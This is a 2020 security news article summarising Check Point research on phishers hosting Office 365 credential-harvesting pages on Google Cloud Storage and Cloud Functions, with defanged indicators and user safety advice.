Posted on July 22, 2020 at 12:42 PM
Check Point researchers revealed yesterday that some hackers are using Google Cloud Platform (GCP) to conceal their phishing attacks. According to Checkpoint, they do this by making use of advanced features in a popular cloud storage service to disguise their malicious intents and avoid getting caught. As a result of the concealing method, the hackers escape traditional red flags for websites without HTTPS certificates or suspicious-looking domains.
In some instances, the hackers uploaded PDF documents to Google Drive, including a phishing page request for Office 365 credentials, which leads to a genuine PDF report published by a popular global consulting firm.
Although the malicious source code is coming from a Ukrainian IP address, the phishing page is hosted on Google Cloud storage.
Phishing document has a link to a malicious page
Earlier this year, the researchers at Check Point stumbled upon an attack, where the actors uploaded PDF documents on Google Drive. The uploaded PDF document has a link to a phishing page. The page was hosted on storage.googleapis[.]com/asharepoint-unwearied_439052791/index.html, and directed the user to use organization email or office 365 to log in.
Whichever option the user chooses, a pop-up window showing the Outlook login page appears.
Once the user enters the credentials, they are directed to a genuine PDF report published by a known global consulting company. The user may not have any suspicion that the request is a phishing one since the phishing page is hosted on Google cloud storage. But from the source code of the phishing page, it reveals that the majority of the resources are uploaded from prvtsmtp[.]com, the attackers’ website.
Actors are using Ukrainian IP address
The phishing actors are now making use of Google Cloud Functions, which is a service that enables the running of codes in the cloud.
For this attack, the Google Cloud Functions were used in loading the resources on the phishing page while the domain details of the attacker remained hidden.
When Check Point was looking into prvtsmtp[.]com, the security firm discovered that it was linked to (31.28.168[.]4), which turned out to be an IP address in Ukraine.
Several other similar domains relating to the phishing attack have the same IP address or a different one but within the same netblock.
“Hackers are swarming around the cloud storage services that we rely on and trust, making it much tougher to identify a phishing attack,” the Check Point research team said.
Check Point further pointed out that the conventional phishing attack red flag such as websites without domains or look-alike domains will not be enough to identify the attacks because the current actors are concealing their tracks carefully. This has been made much harder during this pandemic, as the attackers are taking advantage of several loose securities to pounce on unsuspecting victims.
Users on Google Cloud Platform as well as Azure and AWS users have been advised to be cautious of the recent phishing trend and protect themselves. Check Point says the way is to be wary of files they receive from unsolicited senders.
Check Point cautioned users to be beware of unfamiliar email senders, spelling errors in websites or emails, and lookalike domains. Users should also be cautious about files received from unknown senders requesting certain actions from them.
Also, users should make sure they are ordering goods from a genuine source. The most ideal way to ensure this is by not clicking on promotional links on their emails or any website. Instead, they should go to Google and find the desired link on Google’s result page. But is they have the address to the site, they should type the address straight away.
Also, users are warned against “special” offers that offer a cure for coronavirus, which is generally not a trustworthy or reliable purchase opportunity. Finally, the researchers warn that users should stop reusing passwords between different accounts and applications.